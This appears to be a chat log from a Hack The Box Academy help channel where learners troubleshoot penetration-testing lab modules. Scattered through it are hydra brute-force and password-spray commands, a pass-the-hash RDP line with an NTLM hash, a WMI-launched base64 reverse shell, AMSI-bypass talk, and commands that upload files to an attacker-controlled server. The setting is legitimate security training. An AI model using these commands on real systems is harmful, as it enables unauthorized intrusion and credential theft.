#modules
Depending on what stage you are in the SA, it has to do with permissions
The account might not have the same privileges in the debugging machine and the SA’s target
I'm on the Penetration Testing path, in the "Getting Started" module, specifically on the "Web Enumeration" page. I'm using DirBuster to enumerate directories and have found two paths so far:
http://94.237.60.154:49669/index.php
http://94.237.60.154:49669/wordpress
However, on the WordPress page, I can't select a language. I'm not sure how to proceed with the questions and could really use some hints. Any help would be appreciated!
as much as I'd love to discuss it, I don't want to spoil it for myself rn. Although, I'm fairly certain this is environment fuckery and not permissions
but makes sense what you write, just not in this context for me
There is a note in one of the sections about it
well I got through the first hoop, so I may DM you afterwards if you don't mind
probably not today tho
@ocean night I would like to apply for a refund. I accidentally purchased the Gold Annual Subscription without realizing that I had not canceled my subscription. Due to work reasons, I will not be using it for the time being. Please assist with the refund, thank you.
Because I looked at the historical messages, you had helped with it before, and it caused you a bad feeling. I'm sorry.
Sorry, I just keep getting pinged left right and center
But yeah, speak with support
They will help you if they can.
Note it is late in the day, so there may be a delay in response time.
thank you so much
No problem
I'm currently going through the Network Enumeration with NMAP module, and I can't seem to get tcpdump to pick up the three-way handshake from the nc -nv command
What are some of the most common errors here that I might be missing?
you filtering on the correct interface? the correct port?
Is the correct interface the target IP and the IP of my VPN connection? Does the order matter?
(First time asking a question, so I don’t know how vague I need to be for other’s sake)
As far as the port, I think this instance is… well, very in-your-face about it
make sure tcpdump is listening on the correct interface. The default is unlikely to be the VPN interface if you're trying to capture a connection in the lab environment.
Sorry, apparently I wasn't scrolled all the way down and didn't see Gubarz's reply already.
The VPN interface is likely "tun0". You can see all your interfaces with "ip addr" or "ip link" commands.
It was, in fact, tun0. I was trying eth0 this whole time! Thank you!!
Time to reflect and understand why that was the case
Why are some modules sooo expensive?? Like they're based on cubes and cubes are expensive making them expensive
help
Ctrl + Shift + C doesn't work either?
Does not,
It's weird I somehow did it once but it only copied like half of the payload
Does anyone know why I have 4 different terminals all running hydra -t 48 in Kali Linux and Kali vm still shows CPU is at 1%?
And as always hydra is taking forever
Is there a subnet that I can whitelist in a firewall to alleviate any connectivity issues with the HTB content?
Not currently I'm afraid @terse sedge - I don't believe our IP blocks are contiguous at the moment, but you could always resolve the edge server defined in your ovpn file and whitelist that
All web services go through cloudflare, so you may be able to get a list of subnets from them.
What type of connectivity issues are you facing?
If you're talking about the IPs within the labs once connected to the VPN, I can get those for you.
Is it academy you are having issues with @terse sedge ?
..and if so, any specific subnet that's giving you trouble?
...ok, well ping me if you are still having issues and need the subnets I guess
(although the subnet routes are pushed to you when connecting to the VPN server)
..and they transit through the VPN connection on your host
so unless you have a very restrictive local firewall, I don't think a firewall would be causing you issues
please put module name, section name, question, etc. so people can help out more easily
its command injection the link is there. there is only 1 question, bypassing blacklisted commands
it's harder for people on mobile to use the link
lol htb academy doesnt work on mobile before me
Rather ask for generic advice, or for someone to DM to help advise.
ty
Anyone struggling with the academy lately? it just keeps crashing, I want to use my own parrot box and the VPN servers just not working, when it comes to file transfer onto target it takes forever if it even completes, is it just me?
I think its general issue.. I have the same problem too
Hi, I am currently following the “Password Attacks: Attacking SAM” module. I replicated the steps up till creating the share with smbserver.py. However when I try to move the files from the rdp machine, I keep encountering the access denied error on the rdp machine. Any advice on how to resolve this?
Shame it always feels when I try use my own box i get so limited, files not transfering, when solving a box, a web vulnerability for initial access not working as it should
Double check the command you used to spin up your SMB server. The command they have in the module has the writer's home directory. Double check and make sure you're using your home directory instead.
The command in the module: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
The command modified to use my home directory (for example): sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/miaha/Documents/
Anyone know how to fix this error? I am doing bleeding edge vulnerability of active directory enumeration and attacks module I have successfully taken the certificate of the dc but can't get that saved to a cache file I have tried creating new certificate and added that also but same error
thanks! will try again!
I can’t use general so I will ask here how should I start learning to hack ? Like if there non buyable stuff that I can use things like that
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks
Is there a way to have two boxes open at the same time?
Hey! I have looked at all the open ports and searched for an exploit for each of the services but no luck... Would you have another insight? Thx!
Were you able to figure it out? I'm stuck.
is this normal output from hydra?
Okay what module and section are you in? Mutated passwords?
Password attacks labs easy
My bad I thought you were in Mutated passwords. Sorry. Let me look at this again, and then give you a sanity. I assumed you were in password mutations because that's where most individuals have the issue with the time running for a long time
thats on me
did you try using the pwn machine (the web based machine)?
I think you have access x hours a day or something
No haven't tried
You could try your command and see if it is significantly faster. It seems wild it would take more than 10 min
smells like something real wrong with your VM/connection
How the hell do I copy paste
no idea, just type it out 😄
but if you are doing this one, then you don't need the mutated list right?
from what I understand l0s saying
Hydra finished doing the non mutated list and found nothing
But at this point I don't trust it anymore
hmm, lets see what l0s finds then
let me see if I have enough cubes to try that lab 😄
Lol thx
ah damn, not enough cubes 😦
oh well, I am sure someone has done it, otherwise plenty people in here seem to have done Password Attacks
Currently brute-forcing. Just giving hydra some time to work its magic.
I'm using pwnbox rn
Doing the same. 👍 I'm going to step away for a few minutes to let it run so I'll follow up in a few
Is it saying retrying connection for child [insert number here]
Turn down the threads to 34
There's a threshold it hits and begins to become overwhelmed
Aight I'm not touching it again for 5 minutes
I'll eat a croissant
Fuck this
It's still going
Mine is too so keep letting it go
Okay
I'm fucked either way bc if it works there's something wrong with my VM if it doesn't work there's something wrong with my laptop
Or connection
It looks to be pretty far down the list
from forum posts
And then think it has to iterate over all those usernames
HI
Pivoting, Tunneling, and Port Forwarding > Remote/Reverse Port Forwarding with SSH
when i was running backupscript.exe to get a reverse shell it didnt work, i think that because i didnt put the right ips on this i used this
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.132.37 -vN
what should i replace on these < >
ens192:10.129.132.37
ens224:172.16.5.129
windows:172.16.5.19
I would have prob been halfway through attacking common service module by now if it didn't disconnect as soon as I spawn another target
I'm down to 9000 tries 
Same
Still going. It's on these lists.
im having a little issue in linux fundamentals...the password to ssh is coming back wrong
Anything?
i didnt know where else to post/ask 🤷♂️
Another great module!
https://academy.hackthebox.com/achievement/799850/235
Modern web browsers and applications utilize a variety of security measures to protect against CSRF and XSS vulnerabilities, rendering their exploitation more difficult. This module focuses on exploiting advanced CSRF and XSS vulnerabilities, identifying and bypassing weak and wrongly implemented defensive mechanisms.
Time to wait the subscription hit again! 
18k tries done, 75k to do
What lists are you using again?
i guess theres no help for me since its a password and its failing...trying to respawn machine....see if that fixes the password "bug"
respawn fixed it
hashcat --force password.list -r custom.rule --stdout | sort -u > mutatepass.list
Which ones are in your hydra command?
hydra -L username.list -P mutatepass.list ftp://ip -t 34 -f -vvv
swap it to password.list
I tried it finishes very quickly and gave zero creds
Try it one more time. with the threads at 34
Ok
Let me know if it finishes quick again
It's doing its thing
Perfect. I'd put something on and chill for a minute if it doesn't finish unexpectedly.
Ayyye, Pablo the goat
@scenic plover it got to 11k tries done out of 20k and then is disconnected
@real delta what do you normally use for brute forcing in password attack easy lab
I haven't done the lab
You can use the -R to resume the last brute-force if you got disconnected
Did you get the creds?
I seem to be having a lot of issues with the Evading AD module, in open source software all amsi bypasses dont work because the Load() always gets called out
Yeah, I used the username list they give you in the resource and the password.list. I used 34 threads too
Took me a total of 15 minutes
What the fuck
Disable child bc of too many error
No it has 100 minutes of life
Btw is there a way to make hydra more visually catching? It found the creds but kept going and I didn't see them
It says it took 12 minutes but I don't believe it
But it did find the password and user?
Using Web Proxies, Burp Intruder
Guys, (Excuse my english) using burpsuite intruder: the § symbol, where should it placed exactly? or used?
I am supposed to look for a '.html' file in the /admin directory.
But the examples I see in the session do stuff like this:
GET /§DIRECTORY§/ HTTP/1.1
Should I be doing something like this?
GET /admin/§whatever§ HTTP/1.1
Yes
The only thing that holds the flag generation in that module is the scan that only trigger with specific parameters
If you change one small thing, it will not generate the flag
I copied everything after I couldnt get it working myself
Awesome. Just making sure I didn’t waste all of your time. 🤣 If you use -f it should stop upon finding the first valid set of creds.
in the ss I have shows I even use their syntax to run the scripts, and try all 3 they offer
I got stopped a couple of times because of compiling it in a .NET console app instead of the framework
Ah maybe thats the issue, its just compiled in VS code
Even with codes that achieved what I wanted in different ways
No no absolutely you've been extremely useful thank you
I got a couple of different scripts that spawned and injected in a process
And only one thing would get the flag
When it says denied access - public key if I remember correctly it's in the nmap scan or something?
Check the ports again and try tossing those credentials around a bit to do some manual enum. Might find an interesting document or something
Yeah I have been having issues the whole module. Interesting to see others have as well
Still cant get the static analysis flag because it never turns up
I used that PowerShell C# in a ps1 script
I'm in the broken authentication module and on the authentication bypass via parameter modification. I fuzzed for the user id and got the flag but the flag doesnt work. it says incorrect flag.
Think it’s the same as rasta-mouse’s amsiscanbuffer
Have to use the aes encryption approach, I think
Also got hanged in this
Yeah I did, copied the script exactly in the end, and on the host it scanned and said it passed all checks but no flag was produced 🙃
Support said they dont help with modules so it wont be an issue till I complete the AD pathway
I'll try this
I dont understand why the flag I got doesnt work
I ran this and I still get the same error
I have to assume its something I am doing but I don't understand why none of the patches are working
Is it possible for the module to give me the wrong flag or something?
Unlikely
nevermind I got it. I was copying and pasting and it had a space at the beginning
It seems the amsi bypass is working but the script can never run
Also sidenote, you cant run .exe as a local group policy so the method of running seatbelt.exe never works (obfuscated past defender)
I would love someone to come correct me but for now I think this module is broken
Burp will iterate through the wordlist and place items in the wordlist inside whatever's wrapped in the § characters.
Guys I'm in password attack medium lab. I found the .zip file but zip2john isn't cracking it idk why
zip2john isn't the tool that cracks the password.
hi how many processes should I have going at once if I want this ssh attack to go quickly? this is for the Password Attacks Module in the Linux Credential Hunting section:
hydra -L username.list -P password.list 10.129.194.188 ssh -t 16
maybe 4 max. ssh is slow.
ok
but I tried four and it was taking days to finish like it wouldn't finish in time
probably brute forcing the wrong service or using a wordlist that doesn't contain the passwd then
I used the list in the resources section
I saw in the help near the question abt ssh2john
But how would that help? It's a .zip file not an ssh key
zip2john just provides the hash you can use with john. zip2john just converts it for you, it doesn't crack it, you have to use john to crack the hash.
Oh ye sry I meant that
I did zip2john and made zip.hash then used John --wordlist= rockyou.txt zip.hash
Doesn't crack it, I also tried password.list provided in resources and also pws.list
I'm also trying with hashcat but same
did you try the mutated password list? 😉
Holy shit not again
Wtffffff bro
It's gonna take 4 hours again
it doesn't take anywhere near that long, if your computer is that slow do it on the pwnbox
guys i'm doing the second skill assessment from attacking common web apps and i got the flag and everything but i'm stuck at the first question "What is the URL of the WordPress instance? " what i'm missing here ?
guys, does anyone have experience with burp?? im trying to use the intruder for the first time, but the payload position is greyed out, cant use it
there's a whole module that talks about web proxies which uses burp heavily.
yes, that's the one im using to study
but my burp is not allowing me to use the payload intruder
idk if they removed this from the free version
^
nvm, they simplified, i missed the word ' list '
list is empty, not the position, mb
thanks a lot man
im a newbie here lol
Port 80, try some basic web enumeration.
hi this command didn't work:
```
hydra -L username.list -P password.list 10.129.194.188 ssh -t 4
hydra -L username.list -P password.list 10.129.194.188 ssh -t 16
hydra -L username.list -P password.list 10.129.194.188 ssh -t 36
hydra -L username.list -P password.list 10.129.194.188 ssh -t 64
```
I just get this:
```
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-06 23:22:56
```
this is for the Password Attacks Module's Linux Credential hunting section
am I not supposed to use hydra?
Hello, im following the Active Directory Enumeration & Attacks module but i'm having trouble connecting to most windows machines.
The boxes of this module seem quite unstable as they sometimes work flawlessly, but more often I can't connect to them at all.
The problem persists when trying different rdp tools such as xfreerdp and remmina or when switching between the pwnbox or my own kali machine. My method now is spawning the target and seeing if i can connect to it normally after I let it boot up for about 3-5 mins.
I was wondering if i'm doing something wrong and what I should do differently.
I would say it does allow me to connect once every 6 reboots
Oh i might have found something but I haven't thoroughly tested it yet.
Using the setting /gfx:AVC420 to minimize advanced features seems to be working somehow
I tried WMI but even that aint working for me
i am on password attacks , pass the hash and stuck on the last question i am not able to connect to DC01 , nc aint responding i tried both SMB and WMI
wrong lists
also try to work on a faster protocol ssh is slow and -t 4 is the max it can process the higher -t wont work
can anyone please help me w this ?
thankyou
is there a legal issue with recording the academy material for educational (explanatory) purposes and publishing them online?
if yes, does avoid mentioning HTB academy solves the issue?
as far as I understand, sharing anything above tier 0 content is against terms of service
if HTB was never mentioned, how would they link the published content to theirs?
if you lose a shoe and you start looking for it, how would you know it is yours when you find it
i'd look for something that only exists on my shoe. which mostly doesn't exist
Anyone
sounds like an awesome way to lose goodwill with a major player in the industry
nah, i just find writing content is the best way to assure that you understand a topic very well.. so instead of letting it rot, why not publish it
hmn
"I just find writing <-> is the best way to assure <yourself> that you understand a topic very well" -> I definitely agree
by definition though, it wouldn't rot from then. It would have served its purpose. It might still serve more purpose later on when you come back to your private notes
if you are honest about it though, and rephrase it: "so if I can benefit from it too, why not publish it?" -> because it is against terms of service
if for the first sentence you actually mean "I find that writing content is the best way to assure <others, like an employer> that you understand a topic very well", I disagree, because you can't prove you didn't regurgitate it. The best way to assure others is by demonstrating the skill
that's correct.
i meant the first, writing content proves to yourself that you understood the material correctly. and if u are a good writer it will ease the understanding process to other people in the same boat
hey guys is this a channel for discussing the boxes, or am i in the wrong place?? thank you
recently released boxes have their own dedicated channels too (by name), you'll see them
can anyone help me solve this problem
Thank you buddy
it's your json, needs more quotes
i think put the JSON between quotes?
this is what i have been trying could anyone pls help ?
Module: Attacking common services
Section: Attacking SQL Databases
Task: What is the password for the "mssqlsvc" user?
what I've tried?
- I've tried impersonating (i get permission restriction, unable to impersonate to sa user), retrieving hash (again lack of permission to retrieve hash,
```
1> EXEC master..xp_subdirs '\10.129.225.129\share'
2> GO
Msg 229, Level 14, State 5, Server WIN-02\SQLEXPRESS, Procedure master..xp_subdirs, Line 1
The EXECUTE permission was denied on the object 'xp_subdirs', database 'mssqlsystemresource', schema 'sys'.
```
Hii help
Are u a hacker
far from it
Can u help me
I can't
Do you know someone who can help me
This is module section, you should probably hit up in general section.
I don't have access
What do you need help with Batman?
Check dm
Okay
I don't know about you but I find it pretty cool that when we need Batman we activate the Bat-signal, but when Batman needs help he comes to HTB 😎
Bro check dm please
No, activate the .BAT-file:)
Got the problem with module Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows when trying to crack the tgs with hashcat or john. Neither is working. Please help
Intro to assembly language
Debugging with GDB section
Find hex value in 'rax' in instruction <_start+16> question
I tried hex value i got once reached _start+16 with the help of break command
But it doesn't take the value i entered any clues
Keep getting con reset when trying to connect to port 800 wtf am i doing wrong? Reset the target 3 times already
check the protocol
Web applications run primarily on two protocols, unencrypted and encrypted
Doesnt work on either http or https
Why would it ever work on https on a htb lab?
Hi everyone I am currently on the Windows Attacks & Defense module and I cannot RDP into the first box (Kerberoasting), it says wrong credentials
I had no problems with the previous modules which required RDP as well
Good morning guys, can someone help me with the signature wrapping attack? I've been trying to modify this XML for a few days but it's always giving problems
Hi i am looking for CTF team
best to ask in #1225791307256168448
```
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
```
Does anyone know how to fix this? Bleeding edge vulns of ad enumeration and attacks
@acoustic owl can u give me a hint?
Heyy guys do u know a guy named big brain here
this is not a channel to just chat about random things @rustic sage
please read #welcome
hint for what?
In this matter, I don't know what I'm doing wrong so if you can give me a tip I'd really appreciate it
If you're using xmllint- don't
I’m not, im doing manually
SAML?
Was just performing a fresh kali install, but having this issue for the first time. It's affecting the shared clipboard and prolly other functionality. Anyone know how to fix this? I was just installing the guest additions for this virtual machine in virtualbox.
Also, this was the first time I couldn't run the VBoxLinuxAdditions.run directly, I had to copy all the contents from the cd image to a folder and then run it since it kept saying "permission denied" (yes, I tried running it with sudo and changing the permission, but changing the permission prompted me with "read-only file system").
Also, if I'm in the wrong channel, sorry, please direct me to the right one. Thanks!
Make sure that you do not touch the original assertion and only add your assertion additionally
Can I dm you?
sure
hello everyone , can anyone please help me with this ? from password attack / windows lateral movement / pass the hash
Yes got it thanks a lot!
Hey guys!
https://academy.hackthebox.com/module/143/section/1485
Performing a Reverse Search & Mapping to a GUID Value -
```
An error occurred while enumerating through a collection: The (&ObjectClass -like 'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
+ $Results | Where-Object {$_} | ForEach-Object {
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumerator) [], RuntimeException
+ FullyQualifiedErrorId : BadEnumeration
```
can someone please help me on this (not much familiar with PS)?
Sanity check on Pivoting skill assessment?
I made a pivot with metasploit and did a ping sweep from meterpreter but after setting up the socks server and adding the subnet to the routing table nmap still just says the host is down
Can anyone help with attacking lsass section in pentest job role, I have vendor hash but seems to produce a different password every time I run hashcat none of which seems to be correct
feel free to dm with the hash you found
I completed this a couple days ago and still have the history in my terminal
Thanks 1 min
literally did everything and tried with both socks4 and socks5
hello i am at Attacking Enterprise Networks Lateral Movement at Post-Exploitation/Pillaging
I added my user to the Administrators using the vulnerability on the program that the module says, but i cant open the cmd or powershell as Administrator to run mimikatz for some reason, do i have to do something else ? Like use the kdbx file?
i had to logout login nevermind
I just tried firing up the target machine for the section you listed. Weirdly enough, I can't RDP, it says incorrect credentials... which is weird cuz I copy-pasted it like I always do. I'm assuming you're able to RDP since you tried running the command?
Yes, works only with xfreerdp
I was having trouble logging in with xfreerdp, that's why I tried rdesktop. Will try xfreerdp again.
It will show blank black screen sometimes, try hitting some random keys
Ah, yeah. Hitting Enter usually works when that happens.
Trying the command you were having an issue with now.
Let me know
Worked for me. I even copied your command exactly, so it's kinda weird...
Ohh, I'll try resetting machine
According to the error you received, it has to do with the filter part of the command. I tried running your output through ChatGPT, it suggested enclosing it in double quotes like this:
-Filter "ObjectClass -like 'controlAccessRight'"
So, you could give that a shot. But resetting should prolly fix the issue you're having.
I'll try both, thanks 👍
Another thing you could try is using -eq, so like this:
-Filter "ObjectClass -eq 'controlAccessRight'"
Lmk if you're still getting that error. I wanna know why it's behaving that way for you too.
anyone know why Im getting this error?
Sure, will do once I'm back. 
not cos of that unfortunately
How is the online tool called again to encode/decode all kinds per drag & drop - cant figure it out yet - thx
thats my command
I think cyber chef?
Try using netexec instead. Crackmapexec is no longer maintained iirc. But it should still work...
ahh ok
idk why htb academy was giving the command for crackmap, why would they put something outdated
virtually the same as CME, you can try the exact same command
tbh Im returning to the module after a long time
I can't tell much from the error, prolly something to do with the python libraries maybe.
they will update the content in time
i know they're already doing it for CBBH
ahh ok
ok thx
Sorry can’t help there
Oh okay
help plz my brain is gonna explode
Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?
try this
pipx install git+https://github.com/byt3bl33d3r/CrackMapExec
Cme is deprecated
And archived
Use netexec instead
I deleted your message because technical spoiler in the filename
Thanks, I just installed netexec as suggested
Pls
does anyone have a powershell script that can start an http server?cus with double-pivoting i have really problem ;p
What are you using to pivot?
ligolo,i just need to start a powershell server somehow
http server
try using Start-HTTPListener, I know you can create a webshell on a windows server with PowerShell PSWA as well
```
$httpListener = New-Object System.Net.HttpListener
$httpListener.Prefixes.Add("http://localhost:9090/")
$httpListener.Start()
New-NetFirewallRule -DisplayName "AllowTestWebServer" -Direction Inbound -Protocol TCP -LocalPort 9090 -Action Allow
```
Can someone help me with this Signature wrapping attack? I'm really stuck and I don't know where I'm going wrong in XML
have u got smb on the windows machine ?
just use copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
yes, but i can't connect to the smb with this linux machine. Thats why i am searching for a simple powershell that starts a http server
if your using ligolo you should be able to
the last machine,isn't able to connect to an smb
Someone? Introduction to authentication mechanism
I really don’t have any idea
If you dm me what you’ve tried I’ll take a look after dinner
try python3 -m http.server 8000 --directory /path/on/linux/
Invoke-WebRequest -Uri "http://linux_ip:8000/upload" -Method Put -InFile "C:\path\to\your\file.txt"
you would need to download it on the pivothost though if you dont have access to the last windows machine
crackmapexec smb 10.129.216.193 -u jmarston -p /usr/share/wordlists/fasttrack.txt
anyone any idea why this wont work on attack box
what error are you getting?
command not found
So you've got crackmapexec on the machine your on?
its ok ive just learned CME is deprecated
Using a Bash one-liner for the Attack
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
Kerbrute
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
CME
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
Validate the creds:
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
try any of those 😄 and yeah use nxc if you can
nxc smb 192.168.1.101 -u /path/to/users.txt -p Summer18
nxc smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
thanks bro sorted now
Trying to exploit PRTG. Why is it dropping connections ?
metasploit did the trick
tried - double quote with and without escape, replaced with -eq, removed {}. Now, resetting the machine one more time and will wait for 5mins to load all the things before querying
I imported powerview.ps1 module, am I missing anything else? when I run it for the first time, it automatically loads the AD module.
can sm1 dm me and help me on the command injection module just to avoid spoilers here
I'm also running the powershell command as admin
So none of it worked? Even after resetting?
That's really weird...
Still the very same error or a different error?
same error
Okay, just try removing the filter part and tell me if you get anything.
yup, worked WITHOUT* filter
Worked with??
What did you change to make it work?
it was filter's mismatch i guess
ran this - Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
Filter's mismatch? That's strange...
when time comes, will learn filters later
Hmm... What I find strange is that the syntax of the command you originally used was perfect, I even copy-pasted it, and it worked for me.
The target should be standard, so not sure why...
yeah, I'm confused too
Were you using the same GUID from the example?
nope, I got it from Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
I'm not on my laptop rn so I can't check the output of that, and whether it's the same as the example.
I used the GUID from the example. Maybe it didn't work because the GUID was different.
Wait, doesn't that command just show you what objects a user has access to?
yeah pretty much
It's been a while since I did the module, memory's not the freshest, but ain't that a separate thing from the thing he's trying to reverse map?
ObjectAceType property is returning a GUID value
it for one of the questions for the object ace type question i just used bloodhound ngl
@frank sun when you use the GUID from the example snippet itself, does the command work?
both example and from target machine - sid,guid,etc. almost everything is same
So... Both GUID's are 100% the same but the command still threw the error?
I believe its nothing to do with guid, more with filter syntax
yes
Yeah, I've got no clue then 💀
If someone figures this out, please ping me. I'd like to know why.
yup
CN=Dana Amundsen - combination could be anything??
am I missing any step here? or is it just based on the famous <first-name-first-letter><last-name> (or vice versa) guess
heyy marcielee could you please look at my issue once , i have seen older texts and you have solved this issue for someone else earlier i am really sorry to disturb you like that but i am stuck on it for a while and no one replied to my query the whole day
It's the samaccountname
ohh, it better to run Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt first?
is there any other way you want to share?
Do I let it run
Could anyone please help me with this Password Attacks / Pass the Hash , i am stuck here for a while now , i have already tried a few more variations by switching .htb to .local in domain name and also switching target by ip/dc01 and rechecked the base64 command , still nc isnt listening and making connection , nothing is working , could anyone pls tell what am i missing here ?
it would be a great help , thankyou
catch the shell
need help with windows fundamentals module
@frank sun
@fathom pendant
im trying to smbclient to it using smbclient -L IP -U htb-student but it just says NT_STATUS_UNSUCCESSFUL
I have it running and the windows instance running idk why its saying that?
do I need another ip other than the ip i used for xfreerdp?
where is your nc running?
try using another tool like mimikatz or rubeus ?
but the point of this module was to achieve a reverse shell using invoke-wmiexec or invoke-smbexec
@frank sun
Did u decode the base64 and change the ip?
yes
did use powershell #3 (Base64)?
yes
my base64 almost match the one given in the module
not the end tho idk why even tho the ip and port are same
This is what my notes said for this part: REV SHELL NOT WORKING? type ipconfig and try the other local ip for the rev shell. also try press enter on the netcat session
so i tried to ditch mine and run the exact same module command too but even that didnt work
so maybe its the other local ip you need to use?
ohhhh
maybe i can try that but they have specified the machine name i.e DC01 should work too
This is what my notes say as well: Note: This is to connect from one windows machine to another HOST:MS01 to DC01, you specify the hostname as the target not the IP run the nc.exe on your other windows machine.
you might be trying an IP of public that you use for rdp that won't work, try source listener IP from same domain IP
check that as well ^
yes i am pretty sure i am doing this
Hi all need a little help with a question of active directory powerview skill assessment, the question is: find sid of rachel.flemmings and my question is where is rachel.flemmings ??
My notes also say Go to reverse shell website and create a rev shell with PowerShell #3 (Base64) put your IP and port in there.
well i will try again with your recommendations gimme a min
yes i have done that
like i had the same ip as the module 172.16.1.5
and used same port too 8001 but my base64 encoding was still diff
i didnt change any default settings , kept the encoding on none and shell to sh
still i had a lil diff base64 i am not sure if it is meant to happen
idts it should but alr
os - windows
powershell #3 (Base64)
ip - 172.16... (nc listening)
port - any (8001)
for your target you've put the ip, do it like this:
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e
yes i have tried this too
but it wasnt working , i have tried both .htb and .local in domain name too
try ping the other machine see if u get a response
while the base64 of module ends with yAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
ok i will try that
the document reporting lab VM is terrible
its like a reallly shitty Parrot os that loads like its on dialup
Good evening , could someone help with this :
How many files exist on the system that have the ".log" file extension?
locate *.log | wc -l
24
when i filled in the answer it says incorrect
try find instead
find / -type f -name "*.log" 2>/dev/null | wc -l
try with sudo as well
okay but before that command i did
find /etc/ -name *.log 2>/dev/null | grep system | wc -l
find -name *.log 2>/dev/null | grep system | wc -l
i got 0
find did not return any system I guess
this should work
DCSync (module 143 in AD) is broken. The provided instructions don’t even work. Platform is worse each week.
Perhaps providing some output of the commands you've run might help find the issue and resolve it
@strange pivot @frank sun
I've just tested the exercises in the DCSync section and everything is working as expected
not working i tried ping and yes it is active
and the base64 encoded shell is connecting to 10.129.164.187 yes?
@strange pivot i have rdp as administrator is it correct or should i try it w julio too so that cmd would be on her machine or i could just open cmd as julio using mimikatz
which list is the right one? the custom rules one?
yes i think so idr exactly
but idts i need to do that
i used that ip to rdp to the machine which is my attacker and target is still the one 172.16.1.5 i.e DC01
so i need to base64 encode that , no?
and then connect my main machine 10.129.164.187 to that
through nc'
Do this type ipconfig and try the other local ip for the rev shell
See if the process is running on DC01?
check by its PID
Good to know.
yeaaaaa it is not running in the first place
Ill jump on that section and try it myself, whats the section called? 😄
password attacks / pass the hash
last question
ok doing it now
add me and give me the rdp user and pass etc...
||xfreerdp /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /v:10.129.164.187||
Guys in password attacks hard lab I have to brute force rdp right?
I'm so fucking tired of waiting for brute forcing fk
It's literally eating half of my day
No me and loserr have wasted a whole night trying to a lab yesterday
Fucking hydra
Can u rate modules
i am a noob man , only at my 4th module so far
hi I think I need to brute force the ssh connection for this section's flag. I have tried this but I think I am getting the brute-force format wrong:
hydra -l Will -x 5:9 ssh://10.129.208.34 -t 4
or like this:
hydra -l Will -x 5:9 10.129.208.34 ssh -t 4
why dont we try ftp there aint it faster ?
its not about speed. I get a error when I try to brute force it and I think I am doing the command wrong
What's 5:9?
pattern
I want to try any characters, numbers letters and symbols, but only try passwords with password length between 5 and 9
to speed it up a little
the hint says I need to brute force
I tried dictionary attacks and they didn't work too
even when I did it right
so dictionary attacks clearly aren't the answer here
Read the hint and see if you can create a custom password list for the username they provided.
Didn't they give you a name to jump from?
Yes I'm using it
Johanna
But it says account on ip might be valid but not active for remote desktop
Just have patience
Oh okay so it's normal?
That's just a default response
Aight aight thx
One message removed from a suspended account.
That hint also gives you a username and a base password that you can work from.
I caught onto this and started doing this. I am using a tool called crunch to try and create a password list. I need help creating a list that keeps the order of the characters intact while trying both upper and lowercase and including numbers too
I would just use what was provided in the course. Pretty sure they provided a custom rules file?
I did that but I think I'm doing it wrong
Revisit Password Mutations and if you think you are doing something wrong, you can shoot me a DM and I will check out what you are trying.
Can anyone help me on password attacks,
Pass the hash
Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
I have davids hash but i dont know how to connect to DC01, i tried using invoke-thehash, and i get permission denied.
I used the knowledge I had learned to find a website vulnerability 。。。then.。。what should i do now?
Where should I report this news? Or do I keep trying to exploit his vulnerabilities?
Typically the https://website.com/security.txt will have instructions on reporting
Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?
oh~ thankyou
Isn't there a default cred cheatsheet in that? If that's the one I'm thinking
there is I believe
open your files /usr/share/wordlists/dirbuster/
Different thing entirely
Yeah there's a like a handful of mysql creds
😩
u mean in the cheat sheet?
Yes
ahh ok cool
Also you need to be connected to the host to try and connect
it asks us to get mysql creds
Btw this is very vague and pisses me off, you can be more direct with your question
Ok, and you need to first connect to the target via ssh
my bad lool
Hello
